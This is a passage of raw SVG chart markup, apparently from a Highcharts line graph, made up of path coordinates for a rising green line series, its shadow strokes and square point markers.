110.49875952000116 L 379.8079044117647 110.20181232000115 L 381.3359375 109.91161392000114 L 382.8639705882353 109.91161392000114 L 384.3920036764706 109.91161392000114 L 385.9200367647059 109.13077776000114 L 387.4480698529412 109.13077776000114 L 388.97610294117646 109.13077776000114 L 390.50413602941177 108.82484400000112 L 392.0321691176471 108.79657323733451 L 393.5602022058824 108.79657323733451 L 395.0882352941177 105.94183083733449" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.78819946666667 L 146.01884191176472 236.76743052799998 L 147.546875 236.76743052799998 L 149.0749080882353 236.76743052799998 L 150.6029411764706 236.76743052799998 L 152.13097426470588 236.76743052799998 L 153.6590073529412 236.76743052799998 L 155.18704044117646 236.640553088 L 156.71507352941177 236.640553088 L 158.24310661764707 236.640553088 L 159.77113970588235 236.640553088 L 161.29917279411765 236.640553088 L 162.82720588235296 236.640553088 L 164.35523897058823 236.640553088 L 165.88327205882354 236.640553088 L 167.41130514705884 236.640553088 L 168.93933823529412 236.640553088 L 170.46737132352942 236.640553088 L 171.99540441176472 236.640553088 L 173.5234375 236.640553088 L 175.0514705882353 236.640553088 L 176.5795036764706 236.640553088 L 178.10753676470588 236.640553088 L 179.6355698529412 236.640553088 L 181.1636029411765 236.640553088 L 182.69163602941177 236.640553088 L 184.21966911764707 236.640553088 L 185.74770220588235 236.640553088 L 187.27573529411765 236.640553088 L 188.80376838235296 236.640553088 L 190.33180147058823 236.640553088 L 191.85983455882354 236.640553088 L 193.38786764705884 236.640553088 L 194.91590073529412 236.640553088 L 196.44393382352942 236.640553088 L 197.97196691176472 236.640553088 L 199.5 236.640553088 L 201.0280330882353 236.640553088 L 202.5560661764706 236.640553088 L 204.08409926470588 236.640553088 L 205.6121323529412 236.640553088 L 207.1401654411765 236.640553088 L 208.66819852941177 236.640553088 L 210.19623161764707 236.640553088 L 211.72426470588235 236.640553088 L 213.25229779411765 236.640553088 L 214.78033088235296 236.640553088 L 216.30836397058823 236.640553088 L 217.83639705882354 236.640553088 L 219.36443014705884 236.640553088 L 220.89246323529412 236.640553088 L 222.42049632352942 236.640553088 L 223.94852941176472 236.640553088 L 225.4765625 236.640553088 L 227.0045955882353 236.640553088 L 228.5326286764706 236.640553088 L 230.06066176470588 236.640553088 L 231.5886948529412 236.640553088 L 233.1167279411765 236.640553088 L 234.64476102941177 236.262752896 L 236.17279411764707 235.59710493866626 L 237.70082720588238 235.59710493866626 L 239.22886029411765 235.59710493866626 L 240.75689338235296 235.59710493866626 L 242.28492647058823 235.59710493866626 L 243.81295955882354 235.59710493866626 L 245.34099264705884 235.59710493866626 L 246.86902573529412 235.03695453866627 L 248.39705882352942 235.03695453866627 L 249.92509191176472 235.03695453866627 L 251.453125 235.03695453866627 L 252.9811580882353 235.03695453866627 L 254.5091911764706 234.79627101866626 L 256.0372242647059 234.79627101866626 L 257.56525735294116 234.79627101866626 L 259.09329044117646 234.79627101866626 L 260.62132352941177 234.22608977066625 L 262.1493566176471 234.22608977066625 L 263.6773897058824 233.38053261866628 L 265.2054227941177 232.14064781866625 L 266.7334558823529 231.52650701866628 L 268.26148897058823 230.10567149866625 L 269.78952205882354 228.30374189866626 L 271.31755514705884 225.22707053866628 L 272.84558823529414 225.22707053866628 L 274.37362132352945 225.22707053866628 L 275.9016544117647 225.22707053866628 L 277.4296875 224.81399661866624 L 278.9577205882353 223.65069293866625 L 280.4857536764706 223.65069293866625 L 282.0137867647059 223.65069293866625 L 283.54181985294116 223.65069293866625 L 285.06985294117646 223.65069293866625 L 286.59788602941177 223.65069293866625 L 288.1259191176471 223.65069293866625 L 289.6539522058824 223.65069293866625 L 291.1819852941177 223.65069293866625 L 292.7100183823529 223.65069293866625 L 294.23805147058823 223.65069293866625 L 295.76608455882354 223.65069293866625 L 297.29411764705884 223.65069293866625 L 298.82215073529414 223.65069293866625 L 300.35018382352945 223.65069293866625 L 301.8782169117647 223.65069293866625 L 303.40625 223.65069293866625 L 304.9342830882353 223.01968013866627 L 306.4623161764706 221.93660429866625 L 307.9903492647059 221.93660429866625 L 309.51838235294116 217.78161441066626 L 311.04641544117646 214.86760412799998 L 312.57444852941177 213.88576818133254 L 314.1024816176471 213.88576818133254 L 315.6305147058824 213.88576818133254 L 317.1585477941177 210.6846031679988 L 318.6865808823529 204.55961330133607 L 320.21461397058823 200.26737650133606 L 321.74264705882354 180.01167026133606 L 323.27068014705884 172.83207304533607 L 324.79871323529414 168.88199330133608 L 326.32674632352945 164.46152930133607 L 327.8547794117647 158.0355386133361 L 329.3828125 150.96954501333607 L 330.9108455882353 141.71086629333607 L 332.4388786764706 134.81065321600232 L 333.9669117647059 127.58171674666863 L 335.4949448529412 127.58171674666863 L 337.02297794117646 127.58171674666863 L 338.55101102941177 125.33127216000116 L 340.0790441176471 125.33127216000116 L 341.6070772058824 125.33127216000116 L 343.1351102941177 125.33127216000116 L 344.6631433823529 125.33127216000116 L 346.19117647058823 125.33127216000116 L 347.71920955882354 125.33127216000116 L 349.24724264705884 125.33127216000116 L 350.77527573529414 125.33127216000116 L 352.30330882352945 125.33127216000116 L 353.8313419117647 125.33127216000116 L 355.359375 125.33127216000116 L 356.8874080882353 125.33127216000116 L 358.4154411764706 125.33127216000116 L 359.9434742647059 125.33127216000116 L 361.4715073529412 125.33127216000116 L 362.99954044117646 120.54637296000115 L 364.52757352941177 115.63594608000113 L 366.0556066176471 115.63594608000113 L 367.5836397058824 115.63594608000113 L 369.1116727941177 115.63594608000113 L 370.6397058823529 115.63594608000113 L 372.16773897058823 115.63594608000113 L 373.69577205882354 115.63594608000113 L 375.22380514705884 112.81359792000114 L 376.75183823529414 110.49875952000116 L 378.27987132352945 110.49875952000116 L 379.8079044117647 110.20181232000115 L 381.3359375 109.91161392000114 L 382.8639705882353 109.91161392000114 L 384.3920036764706 109.91161392000114 L 385.9200367647059 109.13077776000114 L 387.4480698529412 109.13077776000114 L 388.97610294117646 109.13077776000114 L 390.50413602941177 108.82484400000112 L 392.0321691176471 108.79657323733451 L 393.5602022058824 108.79657323733451 L 395.0882352941177 105.94183083733449" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.78819946666667 L 146.01884191176472 236.76743052799998 L 147.546875 236.76743052799998 L 149.0749080882353 236.76743052799998 L 150.6029411764706 236.76743052799998 L 152.13097426470588 236.76743052799998 L 153.6590073529412 236.76743052799998 L 155.18704044117646 236.640553088 L 156.71507352941177 236.640553088 L 158.24310661764707 236.640553088 L 159.77113970588235 236.640553088 L 161.29917279411765 236.640553088 L 162.82720588235296 236.640553088 L 164.35523897058823 236.640553088 L 165.88327205882354 236.640553088 L 167.41130514705884 236.640553088 L 168.93933823529412 236.640553088 L 170.46737132352942 236.640553088 L 171.99540441176472 236.640553088 L 173.5234375 236.640553088 L 175.0514705882353 236.640553088 L 176.5795036764706 236.640553088 L 178.10753676470588 236.640553088 L 179.6355698529412 236.640553088 L 181.1636029411765 236.640553088 L 182.69163602941177 236.640553088 L 184.21966911764707 236.640553088 L 185.74770220588235 236.640553088 L 187.27573529411765 236.640553088 L 188.80376838235296 236.640553088 L 190.33180147058823 236.640553088 L 191.85983455882354 236.640553088 L 193.38786764705884 236.640553088 L 194.91590073529412 236.640553088 L 196.44393382352942 236.640553088 L 197.97196691176472 236.640553088 L 199.5 236.640553088 L 201.0280330882353 236.640553088 L 202.5560661764706 236.640553088 L 204.08409926470588 236.640553088 L 205.6121323529412 236.640553088 L 207.1401654411765 236.640553088 L 208.66819852941177 236.640553088 L 210.19623161764707 236.640553088 L 211.72426470588235 236.640553088 L 213.25229779411765 236.640553088 L 214.78033088235296 236.640553088 L 216.30836397058823 236.640553088 L 217.83639705882354 236.640553088 L 219.36443014705884 236.640553088 L 220.89246323529412 236.640553088 L 222.42049632352942 236.640553088 L 223.94852941176472 236.640553088 L 225.4765625 236.640553088 L 227.0045955882353 236.640553088 L 228.5326286764706 236.640553088 L 230.06066176470588 236.640553088 L 231.5886948529412 236.640553088 L 233.1167279411765 236.640553088 L 234.64476102941177 236.262752896 L 236.17279411764707 235.59710493866626 L 237.70082720588238 235.59710493866626 L 239.22886029411765 235.59710493866626 L 240.75689338235296 235.59710493866626 L 242.28492647058823 235.59710493866626 L 243.81295955882354 235.59710493866626 L 245.34099264705884 235.59710493866626 L 246.86902573529412 235.03695453866627 L 248.39705882352942 235.03695453866627 L 249.92509191176472 235.03695453866627 L 251.453125 235.03695453866627 L 252.9811580882353 235.03695453866627 L 254.5091911764706 234.79627101866626 L 256.0372242647059 234.79627101866626 L 257.56525735294116 234.79627101866626 L 259.09329044117646 234.79627101866626 L 260.62132352941177 234.22608977066625 L 262.1493566176471 234.22608977066625 L 263.6773897058824 233.38053261866628 L 265.2054227941177 232.14064781866625 L 266.7334558823529 231.52650701866628 L 268.26148897058823 230.10567149866625 L 269.78952205882354 228.30374189866626 L 271.31755514705884 225.22707053866628 L 272.84558823529414 225.22707053866628 L 274.37362132352945 225.22707053866628 L 275.9016544117647 225.22707053866628 L 277.4296875 224.81399661866624 L 278.9577205882353 223.65069293866625 L 280.4857536764706 223.65069293866625 L 282.0137867647059 223.65069293866625 L 283.54181985294116 223.65069293866625 L 285.06985294117646 223.65069293866625 L 286.59788602941177 223.65069293866625 L 288.1259191176471 223.65069293866625 L 289.6539522058824 223.65069293866625 L 291.1819852941177 223.65069293866625 L 292.7100183823529 223.65069293866625 L 294.23805147058823 223.65069293866625 L 295.76608455882354 223.65069293866625 L 297.29411764705884 223.65069293866625 L 298.82215073529414 223.65069293866625 L 300.35018382352945 223.65069293866625 L 301.8782169117647 223.65069293866625 L 303.40625 223.65069293866625 L 304.9342830882353 223.01968013866627 L 306.4623161764706 221.93660429866625 L 307.9903492647059 221.93660429866625 L 309.51838235294116 217.78161441066626 L 311.04641544117646 214.86760412799998 L 312.57444852941177 213.88576818133254 L 314.1024816176471 213.88576818133254 L 315.6305147058824 213.88576818133254 L 317.1585477941177 210.6846031679988 L 318.6865808823529 204.55961330133607 L 320.21461397058823 200.26737650133606 L 321.74264705882354 180.01167026133606 L 323.27068014705884 172.83207304533607 L 324.79871323529414 168.88199330133608 L 326.32674632352945 164.46152930133607 L 327.8547794117647 158.0355386133361 L 329.3828125 150.96954501333607 L 330.9108455882353 141.71086629333607 L 332.4388786764706 134.81065321600232 L 333.9669117647059 127.58171674666863 L 335.4949448529412 127.58171674666863 L 337.02297794117646 127.58171674666863 L 338.55101102941177 125.33127216000116 L 340.0790441176471 125.33127216000116 L 341.6070772058824 125.33127216000116 L 343.1351102941177 125.33127216000116 L 344.6631433823529 125.33127216000116 L 346.19117647058823 125.33127216000116 L 347.71920955882354 125.33127216000116 L 349.24724264705884 125.33127216000116 L 350.77527573529414 125.33127216000116 L 352.30330882352945 125.33127216000116 L 353.8313419117647 125.33127216000116 L 355.359375 125.33127216000116 L 356.8874080882353 125.33127216000116 L 358.4154411764706 125.33127216000116 L 359.9434742647059 125.33127216000116 L 361.4715073529412 125.33127216000116 L 362.99954044117646 120.54637296000115 L 364.52757352941177 115.63594608000113 L 366.0556066176471 115.63594608000113 L 367.5836397058824 115.63594608000113 L 369.1116727941177 115.63594608000113 L 370.6397058823529 115.63594608000113 L 372.16773897058823 115.63594608000113 L 373.69577205882354 115.63594608000113 L 375.22380514705884 112.81359792000114 L 376.75183823529414 110.49875952000116 L 378.27987132352945 110.49875952000116 L 379.8079044117647 110.20181232000115 L 381.3359375 109.91161392000114 L 382.8639705882353 109.91161392000114 L 384.3920036764706 109.91161392000114 L 385.9200367647059 109.13077776000114 L 387.4480698529412 109.13077776000114 L 388.97610294117646 109.13077776000114 L 390.50413602941177 108.82484400000112 L 392.0321691176471 108.79657323733451 L 393.5602022058824 108.79657323733451 L 395.0882352941177 105.94183083733449" fill="none" stroke="#55BF3B" stroke-width="2"></path><path d="M 392.172 103.172 L 397.828 103.172 397.828 108.828 392.172 108.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 390.672 106.172 L 396.328 106.172 396.328 111.828 390.672 111.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 389.172 106.172 L 394.828 106.172 394.828 111.828 389.172 111.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 387.672 106.172 L 393.328 106.172 393.328 111.828 387.672 111.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 386.172 106.172 L 391.828 106.172 391.828 111.828 386.172 111.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 384.672 106.172 L 390.328 106.172 390.328 111.828 384.672 111.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 383.172 106.172 L 388.828 106.172 388.828 111.828 383.172 111.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 381.672 107.172 L 387.328 107.172 387.328 112.828 381.672 112.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 380.172 107.172 L 385.828 107.172 385.828 112.828 380.172 112.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 378.672 107.172 L 384.328 107.172 384.328 112.828 378.672 112.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 377.172 107.172 L 382.828 107.172 382.828 112.828 377.172 112.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 375.672 107.672 L 381.328 107.672 381.328 113.328 375.672 113.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 374.172 107.672 L 379.828 107.672 379.828 113.328 374.172 113.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 372.172 110.172 L 377.828 110.172 377.828 115.828 372.172 115.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 370.672 112.672 L 376.328 112.672 376.328 118.328 370.672 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 369.172 112.672 L 374.828 112.672 374.828 118.328 369.172 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 367.672 112.672 L 373.328 112.672 373.328 118.328 367.672 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 366.172 112.672 L 371.828 112.672 371.828 118.328 366.172 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 364.672 112.672 L 370.328 112.672 370.328 118.328 364.672 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 363.172 112.672 L 368.828 112.672 368.828 118.328 363.172 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 361.672 112.672 L 367.328 112.672 367.328 118.328 361.672 118.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 360.172 117.672 L 365.828 117.672 365.828 123.328 360.172 123.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 358.672 122.672 L 364.328 122.672 364.328 128.328 358.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 357.172 122.672 L 362.828 122.672 362.828 128.328 357.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 355.672 122.672 L 361.328 122.672 361.328 128.328 355.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 354.172 122.672 L 359.828 122.672 359.828 128.328 354.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 352.672 122.672 L 358.328 122.672 358.328 128.328 352.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 351.172 122.672 L 356.828 122.672 356.828 128.328 351.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 349.672 122.672 L 355.328 122.672 355.328 128.328 349.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 348.172 122.672 L 353.828 122.672 353.828 128.328 348.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 346.172 122.672 L 351.828 122.672 351.828 128.328 346.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 344.672 122.672 L 350.328 122.672 350.328 128.328 344.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 343.172 122.672 L 348.828 122.672 348.828 128.328 343.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 341.672 122.672 L 347.328 122.672 347.328 128.328 341.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 340.172 122.672 L 345.828 122.672 345.828 128.328 340.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 338.672 122.672 L 344.328 122.672 344.328 128.328 338.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 337.172 122.672 L 342.828 122.672 342.828 128.328 337.172 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 335.672 122.672 L 341.328 122.672 341.328 128.328 335.672 128.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 334.172 124.672 L 339.828 124.672 339.828 130.328 334.172 130.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 332.672 124.672 L 338.328 124.672 338.328 130.328 332.672 130.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 331.172 124.672 L 336.828 124.672 336.828 130.328 331.172 130.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 329.672 132.172 L 335.328 132.172 335.328 137.828 329.672 137.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 328.172 138.672 L 333.828 138.672 333.828 144.328 328.172 144.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 326.672 148.172 L 332.328 148.172 332.328 153.828 326.672 153.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 325.172 155.172 L 330.828 155.172 330.828 160.828 325.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 323.672 161.672 L 329.328 161.672 329.328 167.328 323.672 167.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 322.172 166.172 L 327.828 166.172 327.828 171.828 322.172 171.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 320.672 170.172 L 326.328 170.172 326.328 175.828 320.672 175.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 318.672 177.172 L 324.328 177.172 324.328 182.828 318.672 182.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 317.172 197.672 L 322.828 197.672 322.828 203.328 317.172 203.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 315.672 201.672 L 321.328 201.672 321.328 207.328 315.672 207.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 314.172 207.672 L 319.828 207.672 319.828 213.328 314.172 213.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 312.672 211.172 L 318.328 211.172 318.328 216.828 312.672 216.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 311.172 211.172 L 316.828 211.172 316.828 216.828 311.172 216.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 309.672 211.172 L 315.328 211.172 315.328 216.828 309.672 216.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 308.172 212.172 L 313.828 212.172 313.828 217.828 308.172 217.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 306.672 215.172 L 312.328 215.172 312.328 220.828 306.672 220.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 305.172 219.172 L 310.828 219.172 310.828 224.828 305.172 224.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 303.672 219.172 L 309.328 219.172 309.328 224.828 303.672 224.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 302.172 220.172 L 307.828 220.172 307.828 225.828 302.172 225.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 300.672 220.672 L 306.328 220.672 306.328 226.328 300.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 299.172 220.672 L 304.828 220.672 304.828 226.328 299.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 297.672 220.672 L 303.328 220.672 303.328 226.328 297.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 296.172 220.672 L 301.828 220.672 301.828 226.328 296.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 294.672 220.672 L 300.328 220.672 300.328 226.328 294.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 293.172 220.672 L 298.828 220.672 298.828 226.328 293.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 291.172 220.672 L 296.828 220.672 296.828 226.328 291.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 289.672 220.672 L 295.328 220.672 295.328 226.328 289.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 288.172 220.672 L 293.828 220.672 293.828 226.328 288.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 286.672 220.672 L 292.328 220.672 292.328 226.328 286.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 285.172 220.672 L 290.828 220.672 290.828 226.328 285.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 283.672 220.672 L 289.328 220.672 289.328 226.328 283.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 282.172 220.672 L 287.828 220.672 287.828 226.328 282.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 280.672 220.672 L 286.328 220.672 286.328 226.328 280.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 279.172 220.672 L 284.828 220.672 284.828 226.328 279.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 277.672 220.672 L 283.328 220.672 283.328 226.328 277.672 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 276.172 220.672 L 281.828 220.672 281.828 226.328 276.172 226.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 274.672 222.172 L 280.328 222.172 280.328 227.828 274.672 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 273.172 222.172 L 278.828 222.172 278.828 227.828 273.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 271.672 222.172 L 277.328 222.172 277.328 227.828 271.672 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 270.172 222.172 L 275.828 222.172 275.828 227.828 270.172 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 268.672 222.172 L 274.328 222.172 274.328 227.828 268.672 227.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 267.172 225.672 L 272.828 225.672 272.828 231.328 267.172 231.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 265.672 227.172 L 271.328 227.172 271.328 232.828 265.672 232.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 263.672 228.672 L 269.328 228.672 269.328 234.328 263.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 262.172 229.172 L 267.828 229.172 267.828 234.828 262.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 260.672 230.672 L 266.328 230.672 266.328 236.328 260.672 236.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 259.172 231.172 L 264.828 231.172 264.828 236.828 259.172 236.828 Z" 